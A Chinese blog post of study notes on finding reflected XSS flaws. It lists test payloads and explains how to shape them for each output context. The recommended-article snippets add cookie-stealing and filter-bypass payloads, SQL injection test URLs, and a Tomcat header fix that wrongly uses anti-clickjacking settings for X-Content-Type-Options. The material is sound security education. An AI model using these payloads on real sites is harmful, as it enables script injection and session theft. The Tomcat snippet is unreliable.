web前端黑客技术揭秘学习笔记-XSS漏洞挖掘

最新推荐文章于 2023-07-04 16:06:20 发布
最新推荐文章于 2023-07-04 16:06:20 发布
阅读量5.6k 收藏 3
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhaozhanyong/article/details/45690939
版权

0X00

URL 的一种常见组成模式如下:

<scheme>://<netloc>/<path>?<query>#<fragment>

比如,一个最普通的URL 如下:

http://www.foo.com/path/f.php?id=1&type=cool#new

对应关系如下:

<scheme> - http

<netloc> - www.foo.com

<path> - /path/f.php

<query> -id=1&type=cool,包括<参数名=参数值>对

<fragment> - new

对这个URL 来说,攻击者可控的输入点有<path>、<query>、<fragment>三个部分。这

三部分对攻击者(或挖掘工具)来说,其意义非常明确。

那么看下面这个URL:

http://www.foo.com/path/1/id#new

攻击者可以知道是/path 还是<path>,1 是参数值,id 是参数名.

0x01

攻击者可控的输入点有<path>、<query>、<fragment>
三个,其实<fragment>里的值一般不会出现在服务端解析,除非Web 2.0 网站,比如twitter,
它的URL 格式如下:
http://twitter.com/evilcos!#status
请求时,第一步会通过JavaScript 的location.href 获取到完整的URL,并解析出status
值,然后通过各种AJAX 函数来处理请求,最后进行各种局部页面的异步刷新。用户体验
很好,可是爬虫很抓狂。同样,对这部分的反射型XSS 挖掘就困难了很多,我们先从简单
的入手,这个<fragment>暂时跳过。

0x02 XSS测试语句

由于<path>和<query>的情况很相似,所以,下面以流行的<query>为例进行说明。
看下面一个普通的URL:
http://www.foo.com/xss.php?id=1
攻击者会这样进行XSS 测试,将如下payloads 分别添加到id=1:
<script>alert(1)</script>
'"><script>alert(1)</script>
<img/src=@ οnerrοr=alert(1)/>
'"><img/src=@ οnerrοr=alert(1)/>
Web 前端黑客技术揭秘
128
' οnmοuseοver=alert(1) x='
" οnmοuseοver=alert(1) x="
` οnmοuseοver=alert(1) x=`
javascript:alert(1)//
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
'";alert(1)//
</script><script>alert(1)//
}x:expression(alert(1))
alert(1)//
*/-->'"></iframe></script></style></title></textarea></xmp></noscript></
noframes></plaintext><script>alert(1)</script>
然后根据请求后的反应来看是否有弹出窗或者引起浏览器脚本错误。如果出现这些情
况,就几乎可以认为目标存在XSS 漏洞。这些payloads 都很有价值,它们也存在很大的差
异,玄机就出现在HTML 中。


针对这个URL,我们利用的输入点是id=1,那么输出在哪里?可能有如下几处。
 HTML 标签之间,比如:出现在<div id="body">[输出]</div>位置。
 HTML 标签之内,比如:出现在<input type="text" value="[输出]" />位置。
 成为 JavaScript 代码的值,比如:<script>a="[输出]";...</script>位置。
 成为 CSS 代码的值,比如:<style>body{font-size:[输出]px;...}</style>位置。
基本上就这以上四种情况,不过我们对这四种情况还可以细分,你会发现各种差异与
陷阱。下面假设服务端不对用户输入与响应输出做任何编码与过滤。
1.HTML 标签之间
最普通的场景出现在<div id="body">[输出]</div>位置,那么提交:
id=1<script>alert(1)</script>

就可以触发XSS 了。可如果出现在下面这些标签中呢?
<title></title>
<textarea></textarea>
<xmp></xmp>
<iframe></iframe>
<noscript></noscript>
<noframes></noframes>
<plaintext></plaintext>
比如,代码<title><script>alert(1)</script></title>会弹出提示框吗?答案是:都不会!这些标签之间无法执行脚本。XSS 漏洞挖掘机制必须具备这样的区分能力,比如,发现出现在<title></title>中,就将提交的payload 变为:</title><script>alert(1)</script>除了这些,还有两类特殊的标签<script>和<style>,它们是不能嵌套标签的,而且
payload 构造情况会更灵活,除了闭合对应的标签外,还可以利用它们自身可执行脚本的性质来构造特殊的payload,这在下面介绍。

2.HTML 标签之内
最普通的场景出现在<input type="text" value="[输出]" />位置,要触发XSS,有以下两种方法:
 提交 payload:" οnmοuseοver=alert(1) x=",这种是闭合属性,然后使用on 事件来触
发脚本。
 提交 payload:"><script>alert(1)</script>,这种是闭合属性后又闭合标签,然后直接
执行脚本。

题外话:
先来看看这两个payload 哪个更好,如果对比利用效果,自然是第二个更好,因为它可直接执行。可是在工具挖掘中,哪个payload 的成功率更高呢?从对比可知,
第二个比第一个多了<>字符,而很多情况下,目标网站防御XSS 很可能就过滤或编码了<>字符,所以第一个payload 的成功率会更高,这也是漏洞挖掘工具在这个场景中
必须优先使用的payload。换句话说,我们的工具必须知道目标环境的特殊性,然后进行针对性的挖掘,而不应该盲目。

乌托帮主
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss漏洞简析(干货)
Haowill的博客
06-23 4757
xss漏洞 获取cookie: 指向其他url: HTML事件触发XSS:<svg onload/οnclick=“alert(document.domain);”> javascript伪协议:javascript:alert(document.domain); 列: xss漏洞介绍 跨站脚本攻击(cross site scripting),缩写xss 恶意攻击者往web页面里插入script代码,当用户浏览该页面时,嵌入到其中web页面的script代码就会执行,从而达到恶意攻击者攻击用
XSS过滤绕过
zhz990224的博客
02-04 2172
XSS过滤的绕过 脚本标签 如果script被过滤的话,可以使用伪协议的方法: 其中PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==为base64编码的alert(1) 事件理器 不需要用户交互的可执行js的事件理器: onreadystatechange(xml,style,iframe,object,img,input,isindex,
XSS漏洞的小合集
一醉一休的博客
03-03 5227
一.XSS盲打 二.关于htmlspecialchars()函数 三.通过XSS结合钓鱼原理
xss漏洞
weixin_59762059的博客
07-04 422
登录:http://192.168.200.129/06/vul/xss//xssblind/admin_login.php。输入的参数没有被过滤。alert(‘xss’)// 单引号闭合前面 //注释后面字。登录//192.168.200.129/01/vulnerabilities/xss_s/网站,抓包;存储型 xss 代码分析中,看到留言的 inster into 语句中,直接插入留言信息,将如下代码植入怀疑出现xss的地方(注意’的转义),即可在 项目内容 观看XSS效果。
XSS攻击
cxyzupup的博客
01-20 1702
XSS攻击 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录XSS攻击前言一、XSS分类1. 反射型XSS:2. 存储型XSS:3. DOM型XSS:二、XSS盗取Cookie1. cookie介绍:2. 利用反射型xss盗取cookie:三、XSS篡改网页链接1. XSS篡改网页链接:2. 代码分析:3. 利用反射型xss篡改网页链接:四、使用beef
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 2390
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
122-DOM-XSS漏洞挖掘.pdf
最新发布
03-15
122-DOM-XSS漏洞挖掘
XSS跨站脚本攻击漏洞(1)
weixin_51339377的博客
04-05 2893
XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用) 弹窗基本代码: <script>alert(1)</script> 在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码 因为本身存储框,留言板这种就会在...
XSS靶场
weixin_51706044的博客
09-29 409
第一关 利用语句进行弹窗测试就可以<script>alert(1)</script> 第二关 可以发现本题依然是根据GET传参数,查看源代码这是一个value进行输入,使用js恶意代码拼接 构造payload:"/><script>alert(2)</script>// xss秘籍第三式(绕函弹) 根据流程来:一、查看页面,任然是GET型,都是GET型哪有什么区别呢,查看源代码查看仍然是value输入,但是这次是空的值,仍然进行js恶意代码输入.
xxs漏洞挖掘思路
qq_53058639的博客
03-13 345
xss作为江湖上一种常见的攻击手段,一直有广泛的使用。然而怎么样发现一个交互的地方是否会有xss漏洞呢?有一些通用的思路。一下就是思路的总结。
xss漏洞原理分析与挖掘方法
qq_42801460的博客
03-30 742
xss漏洞原理分析与挖掘方法。反射型xss是能挖到的xss中最多的,他的原理如下: 1.黑客发现了一个存在反射型xssURL 2.查看源码根据输出环境构造特定的xss代码,也会进行编码缩短代码,这个可有可无 3.把构造的xss代码发送给受害者 4.受害者点击后执行xss代码 5.完成黑客想要的功能,多是获取cookie
[WEB安全]XSS命令总结
baguangman5501的博客
07-22 1001
一:正常构造方式: 1、无过滤,直接写: <script>alert(1)</script> 2、正常截断: "> <script>alert(1)</script> '> <script>alert(1)</script> 3、不用<>尖括号: " onmouseover=alert(1) ...
XSS之冷门事件
不知名白帽的博客
06-29 636
XSS之冷门事件
SQL注入和XSS bypass waf 测试向量
weixin_30662109的博客
07-22 354
1. 识别脆弱点 http://www.site.com.tr/uyg.asp?id=123'+union+selec+1,2,3-- http://www.site.com.tr/uyg.asp?id=123' http://www.site.com.tr/uyg.asp?id=123<12("/> 2. HTTP参数污染(HPP) http://www.site.com.tr...
Web安全系列(三):XSS 攻击进阶(挖掘漏洞)
weixin_33950035的博客
09-18 369
前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列(二):XSS 攻击进阶(初探 XSS Payload))中,我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了一个小栗子来展示出 XSS Payload 的危害。 目前来说,XSS 的漏洞类型主要分为三类:反射型、存储型、DOM型,在本篇文章当中会以permeate生态测试系统为例,分析网站功...
XSS漏洞
weixin_54475242的博客
03-20 488
XSS漏洞 XSS漏洞 十大漏洞之一 Xss被称为跨站脚本攻击,xss通过将精心构造的代码(JS)代码注入到网页,并由浏览器解释运行这段JS代码,达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 XSS的对象是用户和浏览器。微博,留言板,聊天室等等收集用户输入的地方,都有可能被注入XSS代码,都存在遭受XSS的风险,只要没有对用户的输入进行严格过滤,就会被XSS。 攻击者将恶意代码注入到服务器中 用户在没有防备的情况下
常用xss代码以及绕过
csviking的博客
11-18 7586
常规xss的代码 "OnMoUsEoVeR=prompt(1)// #一般用于表单框插入比较好 "-prompt(1)-" # URL删除参数,列如id=1 xss添加为id="-prompt(1)-"
xss payload
07-15 365
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
tomcat8怎么解决X-XSS-Protection,X-Content-Type-Options漏洞?
12-07
根据提供的引用内容,X-XSS-Protection和X-Content-Type-Options都是用来防范XSS攻击的响应头。其中,X-XSS-Protection可以关闭或启用XSS保护,而X-Content-Type-Options可以防止浏览器将响应内容解释为MIME类型不正确的脚本。下面是Tomcat8如何解决这两个漏洞的方法: 1. 解决X-XSS-Protection漏洞 在Tomcat8中,可以通过修改web.xml文件来添加X-XSS-Protection响应头。具体步骤如下: - 打开Tomcat8的web.xml文件,路径为:$CATALINA_HOME/conf/web.xml。 - 在文件中找到以下代码块: ```xml <filter> <filter-name>httpHeaderSecurity</filter-name> <filter-class>org.apache.catalina.filters.HttpHeaderSecurityFilter</filter-class> </filter> <filter-mapping> <filter-name>httpHeaderSecurity</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> ``` - 在该代码块中添加以下代码: ```xml <init-param> <param-name>xssProtectionEnabled</param-name> <param-value>true</param-value> </init-param> ``` - 保存并关闭文件,重启Tomcat8即可。 2. 解决X-Content-Type-Options漏洞 在Tomcat8中,可以通过修改web.xml文件来添加X-Content-Type-Options响应头。具体步骤如下: - 打开Tomcat8的web.xml文件,路径为:$CATALINA_HOME/conf/web.xml。 - 在文件中找到以下代码块: ```xml <filter> <filter-name>httpHeaderSecurity</filter-name> <filter-class>org.apache.catalina.filters.HttpHeaderSecurityFilter</filter-class> </filter> <filter-mapping> <filter-name>httpHeaderSecurity</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> ``` - 在该代码块中添加以下代码: ```xml <init-param> <param-name>antiClickJackingEnabled</param-name> <param-value>true</param-value> </init-param> <init-param> <param-name>antiClickJackingOption</param-name> <param-value>SAMEORIGIN</param-value> </init-param> ``` - 保存并关闭文件,重启Tomcat8即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值